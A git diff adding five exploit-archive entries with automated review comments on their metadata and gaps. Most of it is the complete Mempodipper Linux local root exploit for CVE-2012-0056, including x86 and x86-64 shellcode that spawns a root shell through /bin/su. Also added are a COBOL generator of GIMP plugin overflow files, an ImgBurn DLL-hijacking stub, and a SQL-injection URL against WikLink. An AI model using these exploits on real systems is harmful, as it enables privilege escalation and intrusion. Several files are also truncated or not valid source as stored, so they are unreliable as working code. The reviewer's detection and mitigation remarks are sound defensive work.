diff --git a/files.csv b/files.csv
index cd728932c..096de86f8 100755
--- a/files.csv
+++ b/files.csv
@@ -31669,3 +31669,8 @@ id,file,description,date,author,platform,type,port
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
+35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
+35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
+35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
+35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
+35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 'getURL.php' SQL Injection Vulnerability",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0
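Review bot: Several of the added index rows disagree with the files they point to. Row 35162 says `GIMP <= 2.6.7` while 35162.cob states that 2.6.11 is vulnerable, row 35164 says `PHP <= 5.3.2` while 35164.php states 5.3.3, and row 35161 is dated 2012-01-12 although the file's own header reads Jan 21, 2012. Row 35163 is typed `dos` and stored under platforms/windows/dos, yet its title and body both describe arbitrary code execution. The `=> 2.6.39` in row 35161 is presumably meant as `>= 2.6.39`. Anyone triaging exposure from this index reads the version range and type first, so these fields should be reconciled with the advisory text before the rows are merged.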
diff --git a/platforms/linux/dos/35162.cob b/platforms/linux/dos/35162.cob
new file mode 100755
index 000000000..e4c97f1bc
--- /dev/null
+++ b/platforms/linux/dos/35162.cob
@@ -0,0 +1,162 @@
+source: http://www.securityfocus.com/bid/45647/info
+
+GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
+
+Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+GIMP 2.6.11 is vulnerable; other versions may also be affected.
+
+000010 IDENTIFICATION DIVISION.
+000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
+000030 AUTHOR. NON-CUSTOMERS CREW.
+000040*SHOE SIZE DECLARATION. 43.
+000050
+000060 ENVIRONMENT DIVISION.
+000070 INPUT-OUTPUT SECTION.
+000080 FILE-CONTROL.
+000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
+000100 ORGANIZATION IS LINE SEQUENTIAL.
+000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
+000120 ORGANIZATION IS LINE SEQUENTIAL.
+000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
+000140 ORGANIZATION IS LINE SEQUENTIAL.
+000150* FOR THE 4TH OVERFLOW, SEE BELOW.
+000160
+000170 DATA DIVISION.
+000180 FILE SECTION.
+000190 FD FILE01.
+000200 01 PRINTLINE PIC X(800).
+000210 FD FILE02.
+000220 01 QRINTLINE PIC X(800).
+000230 FD FILE03.
+000240 01 RRINTLINE PIC X(800).
+000250
+000260 WORKING-STORAGE SECTION.
+000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
+000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
+000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
+000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
+000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
+000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
+000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
+000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
+000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
+000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
+000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
+000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
+000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
+000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
+000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
+000420 01 TEXV-OUT5 PIC X(29) VALUE ''.
+000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
+000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
+000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
+000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
+000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
+000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
+000490 01 TEXV-OUTC PIC X(29) VALUE ''.
+000500 01 TEXV-OUTD PIC X(29) VALUE ''.
+000610
+000620 PROCEDURE DIVISION.
+000630 MAIN-PARAGRAPH.
+000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
+000650 OPEN OUTPUT FILE01.
+000660 WRITE PRINTLINE FROM TEXT-OUT1.
+000670 WRITE PRINTLINE FROM TEXT-OUT2.
+000680 WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
+000690 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000700 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000710 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000720 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000730 WRITE PRINTLINE FROM TEXT-OUT5.
+000740 WRITE PRINTLINE FROM TEXT-OUT6.
+000750 WRITE PRINTLINE FROM TEXT-OUT7.
+000760 WRITE PRINTLINE FROM TEXT-OUT8.
+000770 CLOSE FILE01.
+000780
+000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
+000800 OPEN OUTPUT FILE02.
+000810 WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
+000820 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000830 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000840 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000850 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000860 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000870 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000880 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000890 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000900 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000910 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000920 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000930 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000940 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000950 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000960 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000970 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000980 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000990 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001000 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001010 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001020 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001030 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001040 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001050 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001060 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001070 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001080 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001090 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001100 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001110 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001120 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001130 WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
+001140 WRITE QRINTLINE FROM TEXU-OUT3.
+001150 CLOSE FILE02.
+001160
+001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
+001180 OPEN OUTPUT FILE03.
+001190 WRITE RRINTLINE FROM TEXV-OUT1.
+001200 WRITE RRINTLINE FROM TEXV-OUT2.
+001210 WRITE RRINTLINE FROM TEXV-OUT3.
+001220 WRITE RRINTLINE FROM TEXV-OUT4.
+001230 WRITE RRINTLINE FROM TEXV-OUT5.
+001240 WRITE RRINTLINE FROM TEXV-OUT6.
+001250 WRITE RRINTLINE FROM TEXV-OUT7.
+001260 WRITE RRINTLINE FROM TEXV-OUT8.
+001270 WRITE RRINTLINE FROM TEXV-OUT9.
+001280 WRITE RRINTLINE FROM TEXV-OUTA.
+001290 WRITE RRINTLINE FROM TEXV-OUTB.
+001300 WRITE RRINTLINE FROM TEXV-OUTC.
+001310 WRITE RRINTLINE FROM TEXV-OUTD.
+001320 WRITE RRINTLINE FROM TEXV-OUTE.
+001330 WRITE RRINTLINE FROM TEXV-OUTF.
+001340 WRITE RRINTLINE FROM TEXV-OUTG.
+001350 WRITE RRINTLINE FROM TEXV-OUTH.
+001360 WRITE RRINTLINE FROM TEXV-OUTI.
+001370 WRITE RRINTLINE FROM TEXV-OUTJ.
+001380 WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
+001390 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001400 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001410 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001420 WRITE RRINTLINE FROM TEXV-OUTL.
+001430 WRITE RRINTLINE FROM TEXV-OUTM.
+001440 WRITE RRINTLINE FROM TEXV-OUTN.
+001450 CLOSE FILE03.
+001460
+001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
+001480* OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
+001490* STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
+001500* ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
+001510
+001520* HAPPY NEW YEAR!!! http://rock-madrid.com/
+001530
+001540 STOP RUN.
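Review bot: Ten lines of this file are missing. The hunk header declares 162 added lines but only 152 are present, the sequence numbers jump from 000500 to 000610, and the PROCEDURE DIVISION writes TEXV-OUTE through TEXV-OUTN, none of which is declared in WORKING-STORAGE. The lost lines probably held angle-bracket text, because the same kind of loss shows in 35161.txt (fifteen bare `#include` lines and `®s` where `&regs` was evidently meant), in 35164.php (nothing after the advisory text) and in 35163.c (a bare `#include`). The advisory paragraph above line 000010 is also not in comment form, so the file is not valid COBOL source as stored. Anyone using these entries as regression inputs for a patched parser should treat them as incomplete, and a marker such as `000505* LISTING INCOMPLETE: LINES 000510-000600 LOST ON IMPORT` would make that explicit.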
diff --git a/platforms/linux/local/35161.txt b/platforms/linux/local/35161.txt
new file mode 100755
index 000000000..e9e924e29
--- /dev/null
+++ b/platforms/linux/local/35161.txt
@@ -0,0 +1,291 @@
+/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
+Blog post about it is here: http://blog.zx2c4.com/749
+*/
+
+/*
+ * Mempodipper
+ * by zx2c4
+ *
+ * Linux Local Root Exploit
+ *
+ * Rather than put my write up here, per usual, this time I've put it
+ * in a rather lengthy blog post: http://blog.zx2c4.com/749
+ *
+ * Enjoy.
+ *
+ * - zx2c4
+ * Jan 21, 2012
+ *
+ * CVE-2012-0056
+ */
+
+#define _LARGEFILE64_SOURCE
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+char *prog_name;
+
+int send_fd(int sock, int fd)
+{
+ char buf[1];
+ struct iovec iov;
+ struct msghdr msg;
+ struct cmsghdr *cmsg;
+ int n;
+ char cms[CMSG_SPACE(sizeof(int))];
+
+ buf[0] = 0;
+ iov.iov_base = buf;
+ iov.iov_len = 1;
+
+ memset(&msg, 0, sizeof msg);
+ msg.msg_iov = &iov;
+ msg.msg_iovlen = 1;
+ msg.msg_control = (caddr_t)cms;
+ msg.msg_controllen = CMSG_LEN(sizeof(int));
+
+ cmsg = CMSG_FIRSTHDR(&msg);
+ cmsg->cmsg_len = CMSG_LEN(sizeof(int));
+ cmsg->cmsg_level = SOL_SOCKET;
+ cmsg->cmsg_type = SCM_RIGHTS;
+ memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
+
+ if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
+ return -1;
+ close(sock);
+ return 0;
+}
+
+int recv_fd(int sock)
+{
+ int n;
+ int fd;
+ char buf[1];
+ struct iovec iov;
+ struct msghdr msg;
+ struct cmsghdr *cmsg;
+ char cms[CMSG_SPACE(sizeof(int))];
+
+ iov.iov_base = buf;
+ iov.iov_len = 1;
+
+ memset(&msg, 0, sizeof msg);
+ msg.msg_name = 0;
+ msg.msg_namelen = 0;
+ msg.msg_iov = &iov;
+ msg.msg_iovlen = 1;
+
+ msg.msg_control = (caddr_t)cms;
+ msg.msg_controllen = sizeof cms;
+
+ if ((n = recvmsg(sock, &msg, 0)) < 0)
+ return -1;
+ if (n == 0)
+ return -1;
+ cmsg = CMSG_FIRSTHDR(&msg);
+ memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
+ close(sock);
+ return fd;
+}
+
+unsigned long ptrace_address()
+{
+ int fd[2];
+ printf("[+] Creating ptrace pipe.\n");
+ pipe(fd);
+ fcntl(fd[0], F_SETFL, O_NONBLOCK);
+
+ printf("[+] Forking ptrace child.\n");
+ int child = fork();
+ if (child) {
+ close(fd[1]);
+ char buf;
+ printf("[+] Waiting for ptraced child to give output on syscalls.\n");
+ for (;;) {
+ wait(NULL);
+ if (read(fd[0], &buf, 1) > 0)
+ break;
+ ptrace(PTRACE_SYSCALL, child, NULL, NULL);
+ }
+
+ printf("[+] Error message written. Single stepping to find address.\n");
+ struct user_regs_struct regs;
+ for (;;) {
+ ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
+ wait(NULL);
+ ptrace(PTRACE_GETREGS, child, NULL, ®s);
+#if defined(__i386__)
+#define instruction_pointer regs.eip
+#define upper_bound 0xb0000000
+#elif defined(__x86_64__)
+#define instruction_pointer regs.rip
+#define upper_bound 0x700000000000
+#else
+#error "That platform is not supported."
+#endif
+ if (instruction_pointer < upper_bound) {
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
+ }
+ }
+ } else {
+ printf("[+] Ptrace_traceme'ing process.\n");
+ if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
+ perror("[-] ptrace");
+ return 0;
+ }
+ close(fd[0]);
+ dup2(fd[1], 2);
+ execl("/bin/su", "su", "not-a-valid-user", NULL);
+ }
+ return 0;
+}
+
+unsigned long objdump_address()
+{
+ FILE *command = popen("objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
+ if (!command) {
+ perror("[-] popen");
+ return 0;
+ }
+ char result[32];
+ fgets(result, 32, command);
+ pclose(command);
+ return strtoul(result, NULL, 16);
+}
+
+unsigned long find_address()
+{
+ printf("[+] Ptracing su to find next instruction without reading binary.\n");
+ unsigned long address = ptrace_address();
+ if (!address) {
+ printf("[-] Ptrace failed.\n");
+ printf("[+] Reading su binary with objdump to find exit@plt.\n");
+ address = objdump_address();
+ if (address == ULONG_MAX || !address) {
+ printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
+ printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
+ exit(-1);
+ }
+ }
+ printf("[+] Resolved call address to 0x%lx.\n", address);
+ return address;
+}
+
+int su_padding()
+{
+ printf("[+] Calculating su padding.\n");
+ FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
+ if (!command) {
+ perror("[-] popen");
+ exit(1);
+ }
+ char result[256];
+ fgets(result, 256, command);
+ pclose(command);
+ return strstr(result, "this-user-does-not-exist") - result;
+}
+
+int child(int sock)
+{
+ char parent_mem[256];
+ sprintf(parent_mem, "/proc/%d/mem", getppid());
+ printf("[+] Opening parent mem %s in child.\n", parent_mem);
+ int fd = open(parent_mem, O_RDWR);
+ if (fd < 0) {
+ perror("[-] open");
+ return 1;
+ }
+ printf("[+] Sending fd %d to parent.\n", fd);
+ send_fd(sock, fd);
+ return 0;
+}
+
+int parent(unsigned long address)
+{
+ int sockets[2];
+ printf("[+] Opening socketpair.\n");
+ if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
+ perror("[-] socketpair");
+ return 1;
+ }
+ if (fork()) {
+ printf("[+] Waiting for transferred fd in parent.\n");
+ int fd = recv_fd(sockets[1]);
+ printf("[+] Received fd at %d.\n", fd);
+ if (fd < 0) {
+ perror("[-] recv_fd");
+ return 1;
+ }
+ printf("[+] Assigning fd %d to stderr.\n", fd);
+ dup2(2, 15);
+ dup2(fd, 2);
+
+ unsigned long offset = address - su_padding();
+ printf("[+] Seeking to offset 0x%lx.\n", offset);
+ lseek64(fd, offset, SEEK_SET);
+
+#if defined(__i386__)
+ // See shellcode-32.s in this package for the source.
+ char shellcode[] =
+ "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
+ "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
+ "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
+ "\x80";
+#elif defined(__x86_64__)
+ // See shellcode-64.s in this package for the source.
+ char shellcode[] =
+ "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
+ "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
+ "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
+ "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+#else
+#error "That platform is not supported."
+#endif
+ printf("[+] Executing su with shellcode.\n");
+ execl("/bin/su", "su", shellcode, NULL);
+ } else {
+ char sock[32];
+ sprintf(sock, "%d", sockets[0]);
+ printf("[+] Executing child from child fork.\n");
+ execl("/proc/self/exe", prog_name, "-c", sock, NULL);
+ }
+ return 0;
+}
+
+int main(int argc, char **argv)
+{
+ prog_name = argv[0];
+
+ if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
+ return child(atoi(argv[2]));
+
+ printf("===============================\n");
+ printf("= Mempodipper =\n");
+ printf("= by zx2c4 =\n");
+ printf("= Jan 21, 2012 =\n");
+ printf("===============================\n\n");
+
+ if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
+ return parent(strtoul(argv[2], NULL, 16));
+ else
+ return parent(find_address());
+
+}
\ No newline at end of file
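Review bot: The header comment defers everything to an external blog post, so the file never states what the code does or what a defender should look for. From the visible code, child() opens `/proc/<ppid>/mem` with O_RDWR and passes the descriptor back over SCM_RIGHTS. parent() then `dup2()`s it onto fd 2, seeks it, and execs `/bin/su` with that descriptor as stderr. A short header would keep the entry useful if the link dies, for example `/* CVE-2012-0056: setuid process writes its error output into its own /proc/PID/mem. Detect: unprivileged O_RDWR open of /proc/<pid>/mem followed by exec of a setuid binary. Fix: kernel update for this CVE. */`. The index row's `=> 2.6.39` is the only affected-version hint on the page and should be repeated there.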
diff --git a/platforms/php/dos/35164.php b/platforms/php/dos/35164.php
new file mode 100755
index 000000000..3ae95b838
--- /dev/null
+++ b/platforms/php/dos/35164.php
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45668/info
+
+PHP is prone to a remote denial-of-service vulnerability.
+
+Successful attacks will cause applications written in PHP to hang, creating a denial-of-service condition.
+
+PHP 5.3.3 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/35165.txt b/platforms/php/webapps/35165.txt
new file mode 100755
index 000000000..8ad8ed2b3
--- /dev/null
+++ b/platforms/php/webapps/35165.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45673/info
+
+WikLink is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+WikLink 0.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wiklink/getURL.php?id=-1' union select 1111/*
\ No newline at end of file
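Review bot: The advisory ends at the request example and records no remediation. The example shows the `id` parameter of getURL.php reaching the query with its quote intact, which points to string concatenation rather than a bound parameter. One added line such as `Fix: bind id as a query parameter (or cast it to an integer) before use` would tell an operator of WikLink 0.1.3 what to change instead of only what breaks.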
diff --git a/platforms/windows/dos/35163.c b/platforms/windows/dos/35163.c
new file mode 100755
index 000000000..3d9e022af
--- /dev/null
+++ b/platforms/windows/dos/35163.c
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/45657/info
+
+ImgBurn is prone to an arbitrary-code-execution vulnerability.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+ImgBurn 2.4.0.0 is vulnerable; other versions may also be affected.
+
+#include
+#define DllExport __declspec (dllexport)
+DllExport void DwmSetWindowAttribute() { egg(); }
+
+int egg()
+{
+ system ("calc");
+ exit(0);
+ return 0;
+}
+
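Review bot: The write-up names the trigger (opening a file from a share that also holds a crafted DLL) but neither the underlying weakness nor a mitigation. The stub's only export is `DwmSetWindowAttribute`, and the index title names `dwmapi.dll`. Together these suggest the application resolves that library through the default search order, which includes the current directory. A line such as `Mitigation: load dwmapi.dll from the system directory by full path, or call SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32) at startup; administrators can restrict this with the CWDIllegalInDllSearch registry setting` would cover both the vendor fix and the interim control. Separately, `egg()` is called on the line before it is declared, and the advisory prose is not inside a comment, so the file is not valid C as stored.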